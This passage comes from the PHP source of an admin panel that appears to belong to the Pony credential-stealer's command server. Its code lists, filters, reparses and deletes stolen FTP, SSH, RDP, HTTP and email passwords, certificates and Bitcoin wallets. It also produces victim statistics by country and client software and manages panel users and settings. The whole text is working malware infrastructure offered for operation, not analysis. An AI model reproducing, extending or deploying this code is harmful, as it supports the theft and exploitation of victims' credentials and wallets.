843. list($offset_reports[0], $new_reports_last_24_hours) = $pony_db->get_offset_value_count('WHERE report_id>=\''.mysql_real_escape_string($offset_reports[0]).'\' AND import_time >= DATE_SUB(\''.mysql_real_escape_string(mysql_now_date()).'\',INTERVAL 1 DAY)', 'report_id', CPONY_REPORT_TABLE);
844. list($offset_reports[1], $new_reports_last_hour) = $pony_db->get_offset_value_count('WHERE report_id>=\''.mysql_real_escape_string($offset_reports[1]).'\' AND import_time >= DATE_SUB(\''.mysql_real_escape_string(mysql_now_date()).'\',INTERVAL 1 HOUR)', 'report_id', CPONY_REPORT_TABLE);
845. list($offset_reports[2], $new_reports_last_10_minutes) = $pony_db->get_offset_value_count('WHERE report_id>=\''.mysql_real_escape_string($offset_reports[2]).'\' AND import_time >= DATE_SUB(\''.mysql_real_escape_string(mysql_now_date()).'\',INTERVAL 10 MINUTE)', 'report_id', CPONY_REPORT_TABLE);
846. $smarty->assign('new_reports_last_24_hours', $new_reports_last_24_hours);
847. $smarty->assign('new_reports_last_hour', $new_reports_last_hour);
848. $smarty->assign('new_reports_last_10_minutes', $new_reports_last_10_minutes);
849.  
850. $pony_db->set_multi_option('offset_reports_last',
851. array(
852. $offset_reports[0],
853. $offset_reports[1],
854. $offset_reports[2],
855. )
856. );
857.  
858. $cert_last_import = $pony_db->get_last_cert_date();
859. if ($cert_last_import !== false)
860. {
861. $smarty->assign('cert_last_import', $cert_last_import);
862. }
863.  
864. $wallet_last_import = $pony_db->get_last_wallet_date();
865. if ($wallet_last_import !== false)
866. {
867. $smarty->assign('wallet_last_import', $wallet_last_import);
868. }
869.  
870. $pony_db->unlock_all_tables();
871. }
872.  
873. // -------------------------------------------------------------------------------------------
874. // Page processing code
875. // -------------------------------------------------------------------------------------------
876.  
877. if ($admin_action == 'ftp')
878. {
879. // ---------------------------------------------------------------------------------------
880. // FTP list
881.  
882. if ($admin_routine == 'clear_ftp')
883. {
884. if ($pony_db->priv_can_delete())
885. {
886. $pony_db->clear_table(CPONY_FTP_TABLE, "WHERE url_type='ftp'");
887. clear_floating_offsets($pony_db);
888. }
889. else
890. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
891. }
892. elseif ($admin_routine == 'clear_ssh')
893. {
894. if ($pony_db->priv_can_delete())
895. {
896. $pony_db->clear_table(CPONY_FTP_TABLE, "WHERE url_type='ssh'");
897. clear_floating_offsets($pony_db);
898. }
899. else
900. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
901. }
902.  
903. $offset_ftp_list = $pony_db->get_multi_option('offset_ftp_list', 1);
904. $ftp_list = array();
905. $pony_db->get_ftp_list(false, $ftp_list, 10, 'both', $offset_ftp_list[0]);
906.  
907. foreach ($ftp_list as $ftp_item=>$ftp_value)
908. {
909. $ftp_list[$ftp_item]['module'] = $ftp_list[$ftp_item]['ftp_client'];
910. $ftp_list[$ftp_item]['ftp_client'] = module_name_to_client_name($ftp_list[$ftp_item]['ftp_client']);
911. if (!$pony_db->report_id_exists($ftp_list[$ftp_item]['report_id']))
912. {
913. $ftp_list[$ftp_item]['report_id'] = '';
914. }
915. }
916.  
917. if (count($ftp_list))
918. {
919. $first_id = $ftp_list[count($ftp_list)-1]['ftp_id'];
920. } else
921. {
922. $first_id = 0;
923. }
924.  
925. $pony_db->set_multi_option('offset_ftp_list', array($first_id));
926.  
927. apply_data_filters($smarty, false);
928. smarty_assign_continents($smarty);
929.  
930. smarty_assign_common_vars($smarty, $pony_db);
931. $smarty->assign('ftp_list', $ftp_list);
932. $smarty->display('ftp_list.tpl');
933. }
934. if ($admin_action == 'http')
935. {
936. // ---------------------------------------------------------------------------------------
937. // HTTP list
938.  
939. smarty_assign_continents($smarty);
940.  
941. if ($admin_routine == 'clear_http')
942. {
943. if ($pony_db->priv_can_delete())
944. {
945. $pony_db->clear_table(CPONY_FTP_TABLE, "WHERE (url_type='http') OR (url_type='https')");
946. clear_floating_offsets($pony_db);
947. }
948. else
949. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
950. }
951.  
952. $offset_http_list = $pony_db->get_multi_option('offset_http_list', 1);
953. $http_list = array();
954. $pony_db->get_http_list(false, $http_list, 10, 'both', $offset_http_list[0]);
955.  
956. foreach ($http_list as $http_item=>$http_value)
957. {
958. $http_list[$http_item]['module'] = $http_list[$http_item]['ftp_client'];
959. $http_list[$http_item]['ftp_client'] = module_name_to_client_name($http_list[$http_item]['ftp_client']);
960. if (!$pony_db->report_id_exists($http_list[$http_item]['report_id']))
961. {
962. $http_list[$http_item]['report_id'] = '';
963. }
964. }
965.  
966. if (count($http_list))
967. {
968. $first_id = $http_list[count($http_list)-1]['ftp_id'];
969. } else
970. {
971. $first_id = 0;
972. }
973.  
974. $pony_db->set_multi_option('offset_http_list', array($first_id));
975.  
976. apply_data_filters($smarty, false, 'http');
977. smarty_assign_continents($smarty);
978.  
979. smarty_assign_common_vars($smarty, $pony_db);
980. $smarty->assign('http_list', $http_list);
981. $smarty->display('http_list.tpl');
982. }
983. else if ($admin_action == 'other')
984. {
985. // ---------------------------------------------------------------------------------------
986. // Other
987. if ($admin_routine == 'clear_cert')
988. {
989. if ($pony_db->priv_can_delete())
990. {
991. $pony_db->clear_table(CPONY_CERT_TABLE);
992. show_smarty_success($smarty);
993. }
994. else
995. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
996. } else if ($admin_routine == 'clear_wallet')
997. {
998. if ($pony_db->priv_can_delete())
999. {
1000. $pony_db->clear_table(CPONY_WALLET_TABLE);
1001. show_smarty_success($smarty);
1002. }
1003. else
1004. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
1005. } else if ($admin_routine == 'clear_rdp')
1006. {
1007. if ($pony_db->priv_can_delete())
1008. {
1009. $pony_db->clear_table(CPONY_FTP_TABLE, "WHERE (url_type='rdp')");
1010. clear_floating_offsets($pony_db);
1011. show_smarty_success($smarty);
1012. }
1013. else
1014. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
1015. } else if ($admin_routine == 'clear_email')
1016. {
1017. if ($pony_db->priv_can_delete())
1018. {
1019. $pony_db->clear_table(CPONY_EMAIL_TABLE);
1020. clear_floating_offsets($pony_db);
1021. show_smarty_success($smarty);
1022. }
1023. else
1024. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
1025. }
1026.  
1027. $offset_email_list = $pony_db->get_multi_option('offset_email_list', 1);
1028. $email_list = array();
1029. $pony_db->get_email_list(false, $email_list, 10, '', $offset_email_list[0]);
1030.  
1031. foreach ($email_list as $email_item=>$email_value)
1032. {
1033. $email_list[$email_item]['module'] = $email_list[$email_item]['email_client'];
1034. $email_list[$email_item]['email_client'] = module_name_to_client_name($email_list[$email_item]['email_client']);
1035. }
1036.  
1037. if (count($email_list))
1038. {
1039. $first_id = $email_list[count($email_list)-1]['email_id'];
1040. } else
1041. {
1042. $first_id = 0;
1043. }
1044.  
1045. $pony_db->set_multi_option('offset_email_list', array($first_id));
1046. $smarty->assign('email_list', $email_list);
1047.  
1048. smarty_assign_common_vars($smarty, $pony_db);
1049. $smarty->display("other.tpl");
1050. }
1051. else if ($admin_action == 'stats')
1052. {
1053. // ---------------------------------------------------------------------------------------
1054. // Statistics
1055.  
1056. // FTP clients statistics
1057. $ftp_list = array();
1058. $ftp_clients_list = array();
1059. if ($pony_db->get_ftp_clients_stats($ftp_list) && count($ftp_list) > 0)
1060. {
1061. /*
1062. // Show all FTP clients, even with 0 passwords grabbed
1063. foreach ($global_module_list as $module_list_item)
1064. {
1065. // skip system info module
1066. if ($module_list_item[0] == $global_module_list[0][0])
1067. continue;
1068. if (array_key_exists($module_list_item[0], $ftp_list) === false)
1069. {
1070. $ftp_list[$module_list_item[0]] = '0';
1071. }
1072. }*/
1073.  
1074. $sum = 0;
1075.  
1076. foreach ($ftp_list as $count)
1077. $sum += intval($count);
1078.  
1079. foreach ($ftp_list as $ftp_client=>$count)
1080. {
1081. array_push($ftp_clients_list, array(
1082. 'module'=>$ftp_client,
1083. 'name'=>module_name_to_client_name($ftp_client),
1084. 'count'=>$count,
1085. 'percentage'=>sprintf("%01.2f", $count/$sum*100)
1086. ));
1087. }
1088. }
1089.  
1090. // HTTP clients statistics
1091. $http_list = array();
1092. $http_clients_list = array();
1093. if ($pony_db->get_http_clients_stats($http_list) && count($http_list) > 0)
1094. {
1095. $sum = 0;
1096.  
1097. foreach ($http_list as $count)
1098. $sum += intval($count);
1099.  
1100. foreach ($http_list as $http_client=>$count)
1101. {
1102. array_push($http_clients_list, array(
1103. 'module'=>$http_client,
1104. 'name'=>module_name_to_client_name($http_client),
1105. 'count'=>$count,
1106. 'percentage'=>sprintf("%01.2f", $count/$sum*100)
1107. ));
1108. }
1109. }
1110.  
1111. // E-mail clients statistics
1112. $email_list = array();
1113. $email_clients_list = array();
1114. if ($pony_db->get_email_clients_stats($email_list) && count($email_list) > 0)
1115. {
1116. $sum = 0;
1117.  
1118. foreach ($email_list as $count)
1119. $sum += intval($count);
1120.  
1121. foreach ($email_list as $email_client=>$count)
1122. {
1123. array_push($email_clients_list, array(
1124. 'module'=>$email_client,
1125. 'name'=>module_name_to_client_name($email_client),
1126. 'count'=>$count,
1127. 'percentage'=>sprintf("%01.2f", $count/$sum*100)
1128. ));
1129. }
1130. }
1131.  
1132. // HTTP domains statistics
1133. $http_domain_list = array();
1134. $http_domain_stats = array();
1135. if ($pony_db->get_http_domain_stats($http_domain_list) && count($http_domain_list))
1136. {
1137. $sum = 0;
1138.  
1139. foreach ($http_domain_list as $count)
1140. $sum += intval($count);
1141.  
1142. foreach ($http_domain_list as $domain=>$count)
1143. {
1144. array_push($http_domain_stats, array(
1145. 'domain'=>$domain,
1146. 'count'=>$count,
1147. 'percentage'=>sprintf("%01.2f", $count/$sum*100)
1148. ));
1149. }
1150. }
1151.  
1152. // Bitcoin clients statistics
1153. $bitcoin_list = array();
1154. $bitcoin_clients_list = array();
1155. if ($pony_db->get_bitcoin_clients_stats($bitcoin_list) && count($bitcoin_list) > 0)
1156. {
1157. $sum = 0;
1158.  
1159. foreach ($bitcoin_list as $count)
1160. $sum += intval($count);
1161.  
1162. foreach ($bitcoin_list as $bitcoin_client=>$count)
1163. {
1164. array_push($bitcoin_clients_list, array(
1165. 'module'=>$bitcoin_client,
1166. 'name'=>module_name_to_client_name($bitcoin_client),
1167. 'count'=>$count,
1168. 'percentage'=>sprintf("%01.2f", $count/$sum*100)
1169. ));
1170. }
1171. }
1172.  
1173. // Country statistics
1174. $country_list = array();
1175. $smarty_country_list = array();
1176. if ($pony_db->get_country_stats($country_list) && count($country_list) > 0)
1177. {
1178. // FTP/HTTP stats
1179. if ($enable_http_mode && ($show_http_to_users || $pony_db->priv_is_admin()))
1180. $pony_db->get_all_country_stats($country_ftp_list); // ftp/ssh/rdp/http/https/...
1181. else
1182. $pony_db->get_ftp_country_stats($country_ftp_list); // ftp/ssh only
1183.  
1184. if (is_array($country_ftp_list))
1185. {
1186. foreach ($country_list as $country_name=>$country_value)
1187. {
1188. if (isset($country_ftp_list[$country_name]['ftp_count']))
1189. $country_list[$country_name]['ftp_count'] = $country_ftp_list[$country_name]['ftp_count'];
1190. else
1191. $country_list[$country_name]['ftp_count'] = 0;
1192. }
1193.  
1194. }
1195.  
1196. // E-mail stats
1197. if ($enable_email_mode && ($show_email_to_users || $pony_db->priv_is_admin()))
1198. {
1199. $pony_db->get_email_country_stats($country_email_list);
1200. if (is_array($country_email_list))
1201. {
1202. foreach ($country_list as $country_name=>$country_value)
1203. {
1204. if (isset($country_email_list[$country_name]['email_count']))
1205. {
1206. if (!isset($country_list[$country_name]['ftp_count']))
1207. $country_list[$country_name]['ftp_count'] = 0;
1208. $country_list[$country_name]['ftp_count'] += $country_email_list[$country_name]['email_count'];
1209. }
1210. }
1211.  
1212. }
1213. }
1214.  
1215. // Certificates
1216. $pony_db->get_cert_country_stats($country_cert_list);
1217. if (is_array($country_cert_list))
1218. {
1219. foreach ($country_list as $country_name=>$country_value)
1220. {
1221. if (isset($country_cert_list[$country_name]['cert_count']))
1222. {
1223. if (!isset($country_list[$country_name]['ftp_count']))
1224. $country_list[$country_name]['ftp_count'] = 0;
1225. $country_list[$country_name]['ftp_count'] += $country_cert_list[$country_name]['cert_count'];
1226. }
1227. }
1228. }
1229.  
1230. // Wallets
1231. $pony_db->get_wallet_country_stats($country_wallet_list);
1232. if (is_array($country_wallet_list))
1233. {
1234. foreach ($country_list as $country_name=>$country_value)
1235. {
1236. if (isset($country_wallet_list[$country_name]['wallet_count']))
1237. {
1238. if (!isset($country_list[$country_name]['ftp_count']))
1239. $country_list[$country_name]['ftp_count'] = 0;
1240. $country_list[$country_name]['ftp_count'] += $country_wallet_list[$country_name]['wallet_count'];
1241. }
1242. }
1243. }
1244.  
1245. $report_sum = 0;
1246. $ftp_sum = 0;
1247.  
1248. foreach ($country_list as $count_array)
1249. $report_sum += intval($count_array['report_count']);
1250. foreach ($country_list as $count_array)
1251. if (isset($count_array['ftp_count']))
1252. $ftp_sum += intval($count_array['ftp_count']);
1253.  
1254. $geo_ip = new GeoIP();
1255. foreach ($country_list as $country_code=>$count_array)
1256. {
1257. if ($report_sum != 0)
1258. $report_percentage = sprintf("%01.2f", $count_array['report_count']/$report_sum*100);
1259. else
1260. $report_percentage = '';
1261.  
1262. if ($ftp_sum != 0)
1263. $ftp_percentage = sprintf("%01.2f", intval(assign($count_array['ftp_count']))/$ftp_sum*100);
1264. else
1265. $ftp_percentage = '';
1266.  
1267. $country = '';
1268. $flag_url = '';
1269. $country_name = geoip_country_code_to_country_name($geo_ip, $country_code);
1270.  
1271. array_push($smarty_country_list, array("country_name"=>$country_name,
1272. "country_code"=>$country_code,
1273. "ftp_count"=>intval(assign($count_array['ftp_count'])), "report_count"=>$count_array['report_count'],
1274. "report_percentage"=>$report_percentage,
1275. "ftp_percentage"=>$ftp_percentage));
1276. }
1277. }
1278.  
1279. $smarty->assign('http_clients_list', $http_clients_list);
1280. $smarty->assign('bitcoin_clients_list', $bitcoin_clients_list);
1281. $smarty->assign('ftp_clients_list', $ftp_clients_list);
1282. $smarty->assign('email_clients_list', $email_clients_list);
1283. $smarty->assign('country_list', $smarty_country_list);
1284. $smarty->assign('http_domain_list', $http_domain_stats);
1285. $smarty->display('stats.tpl');
1286. }
1287. else if ($admin_action == 'ping')
1288. {
1289. // ---------------------------------------------------------------------------------------
1290. // Domain management
1291. if (!$show_domains || !$pony_db->priv_can_delete())
1292. {
1293. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
1294. } else
1295. {
1296. if ($admin_routine == 'add')
1297. {
1298. if (trim(assign($_REQUEST['domain'])) != 'http://')
1299. $pony_db->add_domain(trim(assign($_REQUEST['domain'])));
1300. } else if ($admin_routine == 'delete' && nonempty($_REQUEST['domain_id']))
1301. {
1302. $pony_db->delete_domain(trim(assign($_REQUEST['domain_id'])));
1303. }
1304.  
1305. $domain_list = array();
1306. $pony_db->get_domains($domain_list);
1307.  
1308. $smarty->assign("domain_list", $domain_list);
1309. $smarty->display('domains.tpl');
1310. }
1311. }
1312. else if ($admin_action == 'log')
1313. {
1314. // ---------------------------------------------------------------------------------------
1315. // Logs
1316. if ($admin_routine == 'clear_log')
1317. {
1318. if ($pony_db->priv_can_delete())
1319. {
1320. $pony_db->delete_log_items(CPONY_LOG_TABLE);
1321. clear_floating_offsets($pony_db);
1322. }
1323. else
1324. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
1325. }
1326.  
1327. $filter_ip = trim(assign($_REQUEST['filter_ip']));
1328. $filter_hwid = trim(assign($_REQUEST['filter_hwid']));
1329. $filter_notify = trim(assign($_REQUEST['filter_notify']));
1330. $next = trim(assign($_REQUEST['next']));
1331. if (strlen($next) == 0)
1332. $next = '0';
1333. $next = intval($next);
1334. if ($next > 0)
1335. $next--;
1336.  
1337. $max_results = 25; // log lines per page
1338.  
1339. $total_items_count = $pony_db->get_log_row_count_filter($filter_ip, $filter_hwid, $filter_notify);
1340.  
1341. $log_list = array();
1342.  
1343. $pony_db->get_log_list_report_filter($log_list, $next, $max_results, false, $filter_ip, $filter_hwid, $filter_notify);
1344.  
1345. $filter = '';
1346. if (strlen($filter_ip))
1347. $filter .= '&filter_ip='.htmlspecialchars($filter_ip, ENT_QUOTES, 'cp1251');
1348. if (strlen($filter_hwid))
1349. $filter .= '&filter_hwid='.htmlspecialchars($filter_hwid, ENT_QUOTES, 'cp1251');
1350. if (strlen($filter_notify))
1351. $filter .= '&filter_notify='.htmlspecialchars($filter_notify, ENT_QUOTES, 'cp1251');
1352.  
1353. SmartyPaginate::disconnect();
1354. SmartyPaginate::connect();
1355. SmartyPaginate::setLimit($max_results);
1356. SmartyPaginate::setPageLimit(50);
1357. SmartyPaginate::setURL($self_file."?token=".$token."&action=log".$filter);
1358. SmartyPaginate::setTotal($total_items_count);
1359. SmartyPaginate::setPrevText($lang['Previous']);
1360. SmartyPaginate::setNextText($lang['Next']);
1361. SmartyPaginate::assign($smarty);
1362.  
1363. smarty_assign_common_vars($smarty, $pony_db);
1364. $smarty->assign("log_list", $log_list);
1365. $smarty->display('log_list.tpl');
1366. }
1367. else if ($admin_action == 'reports')
1368. {
1369. // ---------------------------------------------------------------------------------------
1370. // Reports
1371. if ($admin_routine == 'clear_reports')
1372. {
1373. if ($pony_db->priv_can_delete())
1374. {
1375. $pony_db->clear_table(CPONY_REPORT_TABLE);
1376. $pony_db->clear_table(CPONY_REPORT_DATA_TABLE);
1377. clear_floating_offsets($pony_db);
1378. } else
1379. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
1380. }
1381. if ($admin_routine == 'delete')
1382. {
1383. if ($pony_db->priv_can_delete())
1384. {
1385. $report_id = trim(assign($_REQUEST['report_id']));
1386. $pony_db->report_remove_errors($report_id);
1387. $pony_db->report_remove($report_id);
1388. clear_floating_offsets($pony_db);
1389. } else
1390. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
1391. }
1392. elseif ($admin_routine == 'view_report' || $admin_routine == 'reparse' || $admin_routine == 'confirm_delete')
1393. {
1394. // View detailed report information
1395. $log_id = trim(assign($_REQUEST['log_id']));
1396. $report_id = trim(assign($_REQUEST['report_id']));
1397.  
1398. $report_size = $pony_db->get_report_sum_linked("WHERE report_id='".mysql_real_escape_string($report_id)."'");
1399.  
1400. $smarty->assign('report_id', $report_id);
1401. $smarty->assign('report_size', $report_size);
1402. $smarty->assign('log_id', $log_id);
1403.  
1404. $log_item_result = $pony_db->get_log_item($log_id);
1405. $report_item_result = $pony_db->get_report_item($report_id);
1406.  
1407. if ($pony_db->state && is_array($report_item_result))
1408. {
1409. $report_item_result['report_source_ip_country_code'] = geo_ip_country_code($report_item_result['report_source_ip']);
1410. $report_item_result['report_source_ip_country_name'] = geo_ip_country_name($report_item_result['report_source_ip']);
1411. }
1412. $smarty->assign('report', $report_item_result);
1413. $smarty->assign('log_item', $log_item_result);
1414. $smarty->display('view_report.tpl');
1415.  
1416. if ($pony_db->state && is_array($report_item_result))
1417. {
1418. echo "<p id='wait_report_data'><span class='wait'></span></p>";
1419.  
1420. my_flush();
1421.  
1422. if ($admin_routine == 'reparse')
1423. {
1424. $ftp_count_before_reparse = $pony_db->get_report_linked_passwords_count($report_id);
1425. $cert_count_before_reparse = $pony_db->get_table_row_count(CPONY_CERT_TABLE);
1426. $wallet_count_before_reparse = $pony_db->get_table_row_count(CPONY_WALLET_TABLE);
1427. $email_count_before_reparse = $pony_db->get_table_row_count(CPONY_EMAIL_TABLE);
1428.  
1429. $report = new report_parser($pony_report_options);
1430. $parse_result = $report->process_report($report_item_result['data'], $pony_db_report_password);
1431. if ($parse_result)
1432. {
1433. if ($enable_http_mode)
1434. $url_list_array = array_merge($report->ftp_lines, $report->http_lines);
1435. else
1436. $url_list_array = $report->ftp_lines;
1437.  
1438. $url_list_array = array_merge($url_list_array, $report->rdp_lines);
1439.  
1440. if ($enable_email_mode)
1441. {
1442. $email_lines = $report->email_lines;
1443. } else
1444. {
1445. $email_lines = null;
1446. }
1447.  
1448. $pony_db->update_parsed_report($report_id, $report->report_os_name, $report->report_is_win64, $report->report_is_admin,
1449. $report->report_hwid, $report->report_version_id, $url_list_array, null, $report->cert_lines, $report->wallet_lines, $email_lines);
1450. if (!count($report->log->log_lines))
1451. {
1452. $pony_db->report_remove_errors($report_id);
1453. }
1454. }
1455. $smarty->assign('parse_result', $parse_result);
1456. $smarty->assign('parse_new_ftp', $pony_db->get_report_linked_passwords_count($report_id)-$ftp_count_before_reparse
1457. + $pony_db->get_table_row_count(CPONY_CERT_TABLE)-$cert_count_before_reparse
1458. + $pony_db->get_table_row_count(CPONY_WALLET_TABLE)-$wallet_count_before_reparse
1459. + $pony_db->get_table_row_count(CPONY_EMAIL_TABLE)-$email_count_before_reparse);
1460. clear_floating_offsets($pony_db);
1461. }
1462.  
1463. // enable debug mode
1464. global $global_verbose_log, $global_allow_all_ftp;
1465. $old_global_verbose_log = $global_verbose_log;
1466. $old_global_allow_all_ftp = $global_allow_all_ftp;
1467.  
1468. $global_verbose_log = true;
1469. $global_allow_all_ftp = true;
1470.  
1471. $report = new report_parser($pony_report_options);
1472. $parse_result = $report->process_report($report_item_result['data'], $pony_db_report_password);
1473.  
1474. $log = $report->log->log_lines;
1475. $log_list = array();
1476. foreach ($log as $log_list_item)
1477. {
1478. list($log_line, $log_extra) = $log_list_item;
1479. if (strpos($log_line, 'NOTIFY_NEW_HTTP:') !== false)
1480. {
1481. if ($enable_http_mode && ($show_http_to_users || $pony_db->priv_is_admin()))
1482. {
1483. array_push($log_list, array('log_line'=>$log_line, 'log_extra'=>$log_extra));
1484. }
1485. } else if (strpos($log_line, 'NOTIFY_NEW_EMAIL:') !== false)
1486. {
1487. if ($enable_email_mode && ($show_email_to_users || $pony_db->priv_is_admin()))
1488. {
1489. array_push($log_list, array('log_line'=>$log_line, 'log_extra'=>$log_extra));
1490. }
1491. } else
1492.  
1493. array_push($log_list, array('log_line'=>$log_line, 'log_extra'=>$log_extra));
1494.  
1495. }
1496.  
1497. $smarty->assign('log_list', $log_list);
1498. $smarty->display('debug_report.tpl');
1499.  
1500. echo '<script type="text/javascript">
1501. //<![CDATA[
1502. $("#wait_report_data").hide();
1503. //]]>
1504. </script>';
1505.  
1506. // revert debug mode change
1507. $global_verbose_log = $old_global_verbose_log;
1508. $global_allow_all_ftp = $old_global_allow_all_ftp;
1509. }
1510. }
1511.  
1512. if ($admin_routine != 'view_report' && $admin_routine != 'reparse' && $admin_routine != 'confirm_delete')
1513. {
1514. $filter_string = trim(assign($_REQUEST['filter_string']));
1515. $filter_ip = trim(assign($_REQUEST['filter_ip']));
1516. $filter_hwid = trim(assign($_REQUEST['filter_hwid']));
1517. $filter_nonparsed = trim(assign($_REQUEST['filter_nonparsed']));
1518. $filter_has_passwords = trim(assign($_REQUEST['filter_has_passwords']));
1519. $next = trim(assign($_REQUEST['next']));
1520. if (strlen($next) == 0)
1521. $next = '0';
1522. $next = intval($next);
1523.  
1524. if ($next > 0)
1525. $next--;
1526.  
1527. $total_items_count = $pony_db->get_report_row_count_filter($filter_ip, $filter_hwid, $filter_nonparsed, $filter_has_passwords, $filter_string);
1528. $max_results = 25;
1529.  
1530. $report_list = array();
1531. $pony_db->get_report_list_filter($report_list, $next, $max_results, $filter_ip, $filter_hwid, $filter_nonparsed, $filter_has_passwords, $filter_string);
1532. $geo_ip = new GeoIP();
1533.  
1534. foreach ($report_list as $report_list_item => $report_list_value)
1535. {
1536. if (isset($report_list[$report_list_item]['report_country']) && strlen($report_list[$report_list_item]['report_country']))
1537. {
1538. $report_list[$report_list_item]['report_country_name'] = geoip_country_code_to_country_name($geo_ip, $report_list[$report_list_item]['report_country']);
1539. } else
1540. {
1541. $report_list[$report_list_item]['report_country_name'] = '';
1542. }
1543. }
1544.  
1545. $filter = '';
1546. if (strlen($filter_string))
1547. $filter .= '&filter_string='.htmlspecialchars($filter_string, ENT_QUOTES, 'cp1251');
1548. if (strlen($filter_ip))
1549. $filter .= '&filter_ip='.htmlspecialchars($filter_ip, ENT_QUOTES, 'cp1251');
1550. if (strlen($filter_hwid))
1551. $filter .= '&filter_hwid='.htmlspecialchars($filter_hwid, ENT_QUOTES, 'cp1251');
1552.  
1553. if (strlen($filter_nonparsed))
1554. $filter .= '&filter_nonparsed='.htmlspecialchars($filter_nonparsed, ENT_QUOTES, 'cp1251');
1555. elseif (strlen($filter_has_passwords))
1556. $filter .= '&filter_has_passwords='.htmlspecialchars($filter_has_passwords, ENT_QUOTES, 'cp1251');
1557.  
1558. SmartyPaginate::disconnect();
1559. SmartyPaginate::connect();
1560. SmartyPaginate::setURL($self_file."?token=".$token."&action=reports".$filter);
1561. SmartyPaginate::setTotal($total_items_count);
1562. SmartyPaginate::setLimit($max_results);
1563. SmartyPaginate::setPageLimit(50);
1564.  
1565. SmartyPaginate::setPrevText($lang['Previous']);
1566. SmartyPaginate::setNextText($lang['Next']);
1567. SmartyPaginate::assign($smarty);
1568.  
1569. smarty_assign_common_vars($smarty, $pony_db);
1570. $smarty->assign("report_list", $report_list);
1571. $smarty->display('report_list.tpl');
1572. }
1573. }
1574. else if ($admin_action == 'admin')
1575. {
1576. // ---------------------------------------------------------------------------------------
1577. // User management
1578.  
1579. if ($admin_routine == 'rebuild_tables')
1580. {
1581. if ($pony_db->priv_is_admin())
1582. {
1583. if ($pony_db->drop_table(CPONY_FTP_TABLE) && $pony_db->drop_table(CPONY_REPORT_TABLE) && $pony_db->drop_table(CPONY_REPORT_DATA_TABLE) &&
1584. $pony_db->drop_table(CPONY_LOG_TABLE) && $pony_db->drop_table(CPONY_CERT_TABLE) && $pony_db->drop_table(CPONY_WALLET_TABLE) && $pony_db->drop_table(CPONY_EMAIL_TABLE) &&
1585. $pony_db->drop_table(CPONY_DOMAINLIST_TABLE) &&
1586. $pony_db->create_data_tables()
1587. && $pony_db->state)
1588. show_smarty_success($smarty);
1589. else
1590. show_smarty_error($smarty);
1591. clear_floating_offsets($pony_db);
1592. } else
1593. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
1594. }
1595. elseif ($admin_routine == 'optimize_tables')
1596. {
1597. if ($pony_db->priv_is_admin())
1598. {
1599. if ($pony_db->optimize_table(CPONY_FTP_TABLE) && $pony_db->optimize_table(CPONY_REPORT_TABLE) && $pony_db->optimize_table(CPONY_REPORT_DATA_TABLE) && $pony_db->optimize_table(CPONY_DOMAIN_TABLE) &&
1600. $pony_db->optimize_table(CPONY_LOG_TABLE) && $pony_db->optimize_table(CPONY_USER_TABLE) && $pony_db->optimize_table(CPONY_CERT_TABLE) && $pony_db->optimize_table(CPONY_WALLET_TABLE) && $pony_db->optimize_table(CPONY_EMAIL_TABLE) &&
1601. $pony_db->optimize_table(CPONY_DOMAINLIST_TABLE)
1602. && $pony_db->state)
1603. show_smarty_success($smarty);
1604. else
1605. show_smarty_error($smarty);
1606. clear_floating_offsets($pony_db);
1607. } else
1608. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
1609. }
1610. elseif ($admin_routine == 'delete')
1611. {
1612. if ($pony_db->priv_is_admin())
1613. {
1614. if ($pony_db->delete_user(trim(assign($_REQUEST['user_id']))))
1615. show_smarty_success($smarty);
1616. else
1617. show_smarty_error($smarty);
1618. } else
1619. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
1620. } elseif ($admin_routine == 'add')
1621. {
1622. $priv = trim(assign($_REQUEST['privileges']));
1623. $new_login = trim(assign($_REQUEST['new_login']));
1624. $new_password = trim(assign($_REQUEST['new_password']));
1625.  
1626. if ($priv != 'user_all')
1627. $priv = 'user_view_only';
1628.  
1629. if ($pony_db->priv_is_admin())
1630. {
1631. if ($pony_db->add_user($new_login, $new_password, $priv))
1632. show_smarty_success($smarty);
1633. else
1634. show_smarty_error($smarty);
1635. } else
1636. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
1637. } else if ($admin_routine == 'edit')
1638. {
1639. $user_id = trim(assign($_REQUEST['user_id']));
1640. $priv = trim(assign($_REQUEST['privileges']));
1641. $new_password = trim(assign($_REQUEST['new_password']));
1642.  
1643. if ($new_password == 'current_HASH_value')
1644. $new_password = '';
1645.  
1646. if ($priv != 'user_all')
1647. $priv = 'user_view_only';
1648.  
1649. if ($pony_db->priv_is_admin())
1650. {
1651. if ($pony_db->update_user($user_id, $new_password, $priv))
1652. show_smarty_success($smarty);
1653. else
1654. show_smarty_error($smarty);
1655. } else
1656. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
1657. } else if ($admin_routine == 'update_server_settings')
1658. {
1659. // Server settings
1660. if ($pony_db->priv_is_admin())
1661. {
1662. $report_password = trim(assign($_REQUEST['report_password']));
1663. $sftp_user = trim(assign($_REQUEST['sftp_user']));
1664. if (!strlen($sftp_user)) $sftp_user = '0';
1665. $sftp_port = trim(assign($_REQUEST['sftp_port']));
1666. if (!strlen($sftp_port)) $sftp_port = '';
1667. $sftp_protocol = trim(assign($_REQUEST['sftp_protocol']));
1668. if (!strlen($sftp_protocol)) $sftp_protocol = '';
1669.  
1670. if ($pony_db->set_option('report_password', $report_password) &&
1671. $pony_db->set_option('sftp_user', $sftp_user) &&
1672. $pony_db->set_option('sftp_port', $sftp_port) &&
1673. $pony_db->set_option('sftp_protocol', $sftp_protocol)
1674. )
1675. show_smarty_success($smarty);
1676. else
1677. show_smarty_error($smarty);
1678. } else
